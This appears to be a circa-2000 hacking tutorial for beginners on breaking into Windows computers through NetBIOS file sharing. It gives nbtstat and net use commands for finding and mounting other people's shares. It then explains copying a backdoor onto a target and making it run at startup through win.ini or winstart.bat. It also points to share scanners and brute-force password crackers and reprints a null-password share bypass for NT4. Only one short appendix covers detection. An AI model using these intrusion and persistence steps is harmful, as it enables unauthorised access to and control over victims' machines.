|
Introduction
Remember that I won't go into much detail, because it could
start getting too complicated to explain to newbies. This is
a newbies guide after all. If you want more detailed
information about file sharing search the web, or read some
good NT networks administration books.
Windows has an option called file and print sharing. You
can use this option in order to "share" drive and printers,
which means giving access to files and printers to other
people - people on your own network, specific IPs or even
the whole world. When you turn this option on, you leave an
open port (port number 139) that accepts connections and
understand the "NetBIOS protocol", a set of commands (a
"language") used to access remote file and print sharing
servers, so that other computers can access the files or
printers you decided to share.
Now sometimes in a small company LAN this could be
extremely useful. For example, instead of having a seperate
printer for each computer, there's just one central printer
in a computer that allows file and print sharing.
But if you are using file sharing in your home computer
(We've seen many people that have this option turned on and
don't even know what it means! Poor souls) that is connected
to the Internet, that could be quite dangerous because
anyone who knows your IP can access your files or printers
you're sharing.
If you don't know if file sharing is active in your
computer just go to the control panel and select the Network
icon. Now you should see a box where you can see all the
network software that you have installed, such as TCP/IP
(Transfer Control Protocol / Internet Protocol. This is the
protocol that is used to transfer data packets over the
Internet. A protocol is like a human language - if two
computers understand it, they can communicate) and probably
a dial-up adapter (so you could transfer TCP/IP packets over
a PPP connection. PPP, or Point to Point Protocol is the
protocol used in dial-up connections), check if you have a
line called File and Printer Sharing.
If you have this then you have sharing activated, to turn
it off just uncheck the "I want to be able to give others
access to my files" and do the same to the other. Let's
return to the ports thing. Remember port 139? The File
Sharing Port is port 139 and it's called NetBIOS Session
Service port. When you have this option enabled you also
have 2 other ports open but they use the UDP protocol
instead of the TCP protocol. These ports are 137 (Name
Service) and 138 (Datagram Service). Now if you know
anything about DoS attacks (known to many as nukes) port 139
should sound familiar... There's a kind of DoS (stands for
Denial of Service) attack called the OOB nuke (OOB stands
for Out Of Band) or "winnuke" that sends an OOB packet to
port 139 and makes Windows lose connection and drop the user
to "blue screen mode". If you wish to know more about DoS
attacks, I suggest that you wait for the DoS attacks
tutorial (at the time this tutorial was written, the DoS
attacks tutorial didn't exist yet. However, by the time you
read it it might already be available, so you can try and
get it from http://blacksun.box.sk).
Okay, enough said, let's get on with it.
----------- Getting In -----------
I'm going to explain two ways of breaking into a Windows
box that has file sharing enabled. Just to see how unsafe
Windows is, the programs you'll need come with Windows.
isn't that ironic? Okay, of course they come with Windows!
Would you actually expect Microsoft to release an OS that
supports sharing without the tools to access shares?
Now, of course, you can hack file and print sharing through
Unix as well. We'll get to that in the end. Right now we're
dealing with Windows here. Both ways will have equal starts
but then in one of the ways you'll keep typing commands, and
in the other way you'll use a GUI (for the ppl who don't
know GUI stands for Graphical User Interface) software. The
programs that you need are called Nbtstat.exe and Net.exe
you can find it in the windows directory. These programs run
from the MS-DOS prompt. To see the help menu for nbtstat
type nbtstat /? And for net type net /?. Now if you are
using Windows 95 you can have the option NetBios Over TCP/IP
disabled and with that disabled nbtstat won't work and will
display a error message like this one: "Failed to access NBT
driver" without the quotes. So if this error message comes
up just go to the control panel, and select the network
icon. Now select TCP/IP and choose properties, in the TCP/IP
properties box select the NetBIOS sheet, and enable it
checking the box that shouldn't have a cross.
If you have Windows 98 the error message shouldn't be
displayed unless you have some kind of a port blocker on
port 139 (such as Nukenabber). A lot of people have these
things on to detect OOB nuke attempts (usually newbies that
can't use a firewall or lamers that never attempted to.
Hopefully not you). Now, you must be thinking that enabling
NetBIOS over TCP/IP opens the same three ports, that you use
to access a computer. That's true, because if you want to
use the same protocol you'll need to use the same default
ports, or you can use a terminal emulator to connect to port
139 and instead of using the application I mentioned to type
the protocol commands, but that's a real pain in the ass.
Remember that there isn't any problem with the file sharing,
because you don't have it enabled, you've just got the ports
open (you are just vulnerable to the DoS attack, you can use
a firewall or get a patch for it at www.theargon.com (click
on defenses and find the OOB patch), but I don't know if
that would block the incoming data from the host that you
are trying to get in).
Now that you have your NbtStat.exe ready to roll, choose
the computer. You can use the hostname or the IP but you
need to use different switches (I'll get to that in a
second). Let's suppose for a second that this computer's
hostname is Mycomputer.MyIsp.com and the IP is 194.65.34.3.
The first thing you need to do is to see if the computer has
file sharing enabled. How can you do that? It's easy. Type:
nbtstat -a hostname
In this case nbtstat -a Mycomputer.MyIsp.com, but if you
want to use the IP you need to type:
nbtstat -A IP
In this case nbtstat -A 194.65.34.3
That's strange because DOS isn't case sensitive... but
that's how things work (I guess that although DOS isn't case
sensitive, this rule doesn't apply to command parameters.
Makes more sense than the opposite). Now you might receive
two different kinds of replies. One that just says "Host Not
Found". If you get this message, you can give up trying to
access the share part of that computer, because that
computer hasn't got the NetBIOS protocol enabled, or you
mistyped the hostname or IP. On the other hand, if you get a
table with names, type of sharing and status, it might be
your lucky day! Now if you get this table you're half way
in. But remember that sometimes you will get that table but
you will not be able to do anything productive with it,
because the computer won't be sharing anything.
The table should look something like the one that is below:
Name Type Status
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered
If you want to access your own sharing table just type
nbtstat -n
The values in the brackets can be:
00 base computernames and workgroups, also in "*" queries
01 master browser, in magic __MSBROWSE__ cookie
03 messaging/alerter service; name of logged-in user <---
This one is cool too ---
20 resource-sharing "server service" name <--- Check this
one ---
1B domain master-browser name
1C domain controller name
1E domain/workgroup master browser election announcement
[?]
I'll talk about messaging/alert service later, if you want
to read about it now, just scroll down until you find
Messaging/Alert Service.
So if the value in the <xx> box is 20 (by the way, the
values are displayed in hex code) it means that there is
sharing enabled. So now how can someone get in? Easy. First
you need to create an entry in your Lmhosts file (can be
found at c:\windows\Lmhosts (yes, no extension). There is
also an example file at c:\windows\Lmhosts.sam, but this is
not the file you should edit. In Windows NT, these files can
be found at c:\WinNT\Lmhosts and c:\WinNT\Lmhosts.sam). If
you don't have the Lmhosts file, just create it. Read all
the information in the sample file file below.
--- Lmhosts.sam file ---
# Copyright (c) 1993-1995 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft
TCP/IP for Windows
# NT.
#
# This file contains the mappings of IP addresses to NT
computernames
# (NetBIOS) names. Each entry should be kept on an
individual line.
# The IP address should be placed in the first column
followed by the
# corresponding computername. The address and the
comptername
# should be separated by at least one space or tab. The "#"
character
# is generally used to denote the start of a comment (see
the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x
TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:<domain>
# #INCLUDE <filename>
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters
"#PRE" will cause
# the entry to be preloaded into the name cache. By
default, entries are
# not preloaded, but are parsed only after dynamic name
resolution fails.
#
# Following an entry with the "#DOM:<domain>" tag will
associate the
# entry with the domain specified by <domain>. This affects
how the
# browser and logon services behave in TCP/IP environments.
To preload
# the host name associated with #DOM entry, it is necessary
to also add a
# #PRE to the line. The <domain> is always preloaded
although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE <filename>" will force the RFC
NetBIOS (NBT)
# software to seek the specified <filename> and parse it as
if it were
# local. <filename> is generally a UNC-based name, allowing
a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP
address of the
# server prior to the #INCLUDE. This mapping must use the
#PRE directive.
# In addtion the share "public" in the example below must
be in the
# LanManServer list of "NullSessionShares" in order for
client machines to
# be able to read the lmhosts file successfully. This key
is under
#
\machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found
there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple
#INCLUDE
# statements to be grouped together. Any single successful
include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in
mappings by
# first surrounding the NetBIOS name in quotations, then
using the
# \0xnn notation to specify a hex value for a non-printing
character.
#
# The following example illustrates all of these
extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the
include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a
special
# character in its name, the "popular" and "localsrv"
server names are
# preloaded, and the "rhino" server name is specified so it
can be used
# to later #INCLUDE a centrally maintained lmhosts file if
the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on
each lookup,
# so keeping the number of comments to a minimum will
improve performance.
# Therefore it is not advisable to simply add lmhosts file
entries onto the
# end of this file.
To create an entry just open the Lmhosts file in your
favorite word processor and enter your target's IP, press
tab and enter the share name (the one that is listed in the
name field). Save the file and exit. Now the are two methods
to access the remote shares you're after: the easy way and
the cool way.
---
The easy way (GUI) ---
If you don't want to have any more trouble just press
start, click find and select find computer. Enter the
target's IP address. If your Lmhosts entry is correct, it
will show the computer you want in the search window. Just
click on the computer icon, and start browsing through that
computer like you were browsing your own computer.
---
The cool way ---
Now it's time to get to know the net.exe program. To access
the help menu just type:
net /? (in a dos Window).
I suggest to redirect all the help to a file and then read
it (use net /? > somefile.txt to redirect all output to
somefile.txt and overwrite it, or net /? >> somefile.txt to
append the output to the file without deleting it). You can
also do net option /? to get more help about that option. To
access the share, you create a virtual drive that will be
the share in the other host. In order to do this you will
need to enter:
net use drive \\[ipaddress]\[sharename]
Where:
drive is the drive letter you want. For example f: g: z:
ipaddress is the target host's IP
sharename is the name of the share (remember the table we
discussed about before?)
After doing this you just need to type drive: and then
browse the new drive using Ms-DOS like if you were in your
own hard disk (for example, type: f: If your new virtual
drive has been assigned the letter f).
Example:
Lets say that you coded a *really cool* backdoor, and you
want to run on a computer that has share enabled, the share
name is Flintstone and the ipaddress is 145.42.23.14 .
c:\>net use f: \\145.42.23.14\Flinstone
Now you would just need to copy the backdoor to the new
virtual drive.
c:\>copy backdoor.exe f:\backdoor.exe
-----
First Version Text ------
Then you would just change drive and run the backdoor.
c:\>f:
f:\>backdoor.exe
And the backdoor is loaded, so now you can use it to access
this computer.
--------------------------------------------------------------------------------
I'm deeply sorry, but what is written between the ----First
Version Text--- is wrong. Using what is there what probably
would happen was installing the backdoor in your own
computer and not in the target host. Thanks to Kimmo from
the a-Men Group that correct me. What you really need to do
is to copy the backdoor.exe file to the share, and then edit
the win.ini file adding the line:
run=%SystemRoot%\backdoor.exe
--------------------------------------------------------------------------------
NOTE: Why %SystemRoot% ?
We need to use %SystemRoot% instead of F:, because F: is a
virtual drive so in the the host that drive could not exist,
so you use the variable %SystemRoot% that will return the
correct drice.
--------------------------------------------------------------------------------
Of course, you can also put the backdoor in other places,
such as c:\windows\winstart.bat (enter the line
%SystemRoot%\backdoor.exe as a new blank line). If there is
no such file, create it.
Messaging/Alert Service
What's this feature? It doesn't let you access the files
for certain, but it's kinda fun, because what it does is
send a message, in Message Box Format to the other host.
Watch the face of the guy that is on the computer when he
sees a message box saying "Error: User To Stupid". However,
you need to remember that your host will be shown in the
message box, but if you spoof your host, you can have a good
laugh with this. When using this feature you also need to
create a new entry in your Lmhosts file. Remember that this
can only be used in a LAN network such as a school LAN with
your friends, just to see their faces, nothing more. Even if
you wanted to send it over the Internet you couldn't because
it uses a broadcast system, and when any broadcasted packets
get to a router they are immediately deleted (security
reasons. Off the topic of this tutorial).
To send a message to the other computer that computer needs
to have a <03> value. As you can see in the table somewhere
in the middle of the file, &l;03 says:
03 messaging/alerter service; name of logged-in user <---
This one is cool too ---
So if your target computer has this turned on you can send
a message by typing: net send sharename message If you are
in an LAN and don't want people to mess with you, type: net
stop messenger Doing this you stop the msg service, so you
won't be able to send or receive messages using the net send
syntax. If you want to enable it again, type:
net start messenger
Now you'll be able to send and receive messages again.
Appendix A: Accessing Windows shares from Unix
The easiest way is to use an X-Windows program called
LinNeighborhood, which can be downloaded from
http://www.bnro.de/~schmidjo/. However, you can also do that
from your console or xterm window, by using the smb
commands. To learn more, read the man pages of the following
commands:
smbclient
smbmnt
smbmount
smbprint
smbumount
Appendix B: Finding sharing hosts
Suppose you're an admin that wants to scan his network for
vulnerable hosts. Suppose you're a bored cracker that wants
to find possible targets. In both cases you'd want to have a
shares scanner to do the job for you. You can use a shares
scanner to scan whole subnets and look for vulnerable hosts
for you. Get Legion or NbtScan from
packetstorm.securify.com.
Appendix C: Password-Protected shares
Are you an admin that wants to test how strong his password
protected shares are? Are you a cracker that came across a
password-protected share and don't know what to do? You
could try to get a brute-force sharing password cracker
that'll try passwords for you until it finds the correct
one. Cain is one such program, that also has some other
features that you might want to check out.
Appendix D: Detecting Sharing Attacks
Sharing attacks are usually pretty easy to detect (unless
the attacker is spoofing or performing his attack from
another host, thus making it appear as if the other host is
really the attacker). The simplest program for the job is
Lockdown 2000 (from www.lockdown.com). However, it is quite
buggy and doesn't always perform well. You can also try
Notron AtGuard (www.norton.com) - I believe it can also
detect sharing attacks, although I havn't tested it yet.
However, if you're going for the real thing, you should try
and get a good firewall or intrusion detection system. My
personal favorite for Unix systems is ipchains (search
linux.box.sk, freshmeat.net or any of your other favorites),
while for Windows systems I recommend Firewall-1 (search the
net, you should be able to come across it pretty quickly).
Appendix E: An Easier Way to Access Shares
Got the target's IP address? Good. Got the share name?
Good. Now hit start, then hit run, and then type:
//ip-address(or hostname)/sharename
For example: //65.4.78.203/someshare
You will be able to access the share using an interface
similar to what you get when you double-click on the "my
computer" icon, and get rid of the need to assign a virtual
drive.
http://blacksun.box.sk
Appendix F: Breaking Password-Protected Shares Without
Brute-Forcing
The following was pasted from the Keen Veracity e-zine,
volume 9:
[More Bugs In Windows NT]
===============================================[Ntwak0]
Subject: Password problem In NT when connecting to a share,
should I say you do not need a password in some cases even
if it is protected I mean :)
Monday, December 27, 1999 by NtWaK0
Tested on NT 4.0 +SP6 + SP6a.
I will try to do it by example in this case you will be
able to repeat it
--> I am going to map a network share call it X:
E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.
--> I done net view to see the shared resources
E:\Tmp>net view \\1.1.1.1
Shared resources at \\1.1.1.1
Share name Type Used as Comment
Tmp Disk X:
The command completed successfully.
--> Now I copyed a file to X: to use the 1.1.1.1 resources.
E:\Tmp>copy test.txt x:
1 file(s) copied.
--> Now I delete the connection I created to 1.1.1.1 using
X:
E:\Tmp>net use /delete x:
x: was deleted successfully.
--> Now I tryed to recreate the connection using NULL
password just for fun i was doing this
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
E:\Tmp>
--> It is normal I could not login now I done
The Bug:
--> Now Reconnect using the command line
E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.
--> I used Explorer to copy the same file test.txt from my
drive E:\tmp to the mapped drive X:
--> I got a msg saying "The file already exist do you wana
overwrite it?" I said yes, well it is normal I did copy it
before as you saw in the step above .
--> After copying the file in explorer I did right click on
X: (the mapped drive) and disconnect
--> I got a msg box saying "There are currently files open
on X: (connected to \\1.1.1.1\tmp).
If you do close the files before disconnecting from the
network, data may be lost.
"Do you want to disconnect the device anyway?"
Then I clicked Yes in this case I have no more connection
mapped to X: In this case I should not be able to connect
without password or username but not true ;)
--> Next I do not know what I tried it I guess for fun In
DOS window I typed
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
The command completed successfully.
--> W00t I was able to login I did not believe hehe with no
password.
--> To make sure i was not dreaming or missing sleep, I was
able to repeat it like 10 times.
But if you do connect and disconnect using net use /delete
x: this will work and you cannot connect with no password
like the explore case.
So you this is a security bug that you can reproduce it in
explore and DOS command and it has to follow certain steps .
What do I mean by that ? well you have to disconnect using
explore and when you get the msg saying : "There are
currently files open on X:(connected to \\1.1.1.1\tmp) blah
blah... In that case if you disconnect and reconnect right
after using no password that should work. ;) But if you do
it all from the command line this should not work and that
is normal.
Here is an example done all by command line:
E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0
The command completed successfully.
E:\Tmp>copy test.txt x:test.txt
1 file(s) copied.
E:\Tmp>net use /delete x:
x: was deleted successfully.
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred. Logon failure: unknown user
name or bad password.
E:\Tmp>
Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng.
Etc..)-oOo|-+-|-+-|-+-||-+-|
The only secure computer is one that's unplugged, locked in
a
safe, and buried 20 feet under the ground in a secret
location...
and i'm not even too sure about that one"--Dennis Huges,
FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)
Credits
written by R A V E N <barakirs@netvision.net.il>
Thanks to Oggy, a totally kewl and helpful guy that helped
us release this tutorial faster.
version 1.3, 4/2/2000 |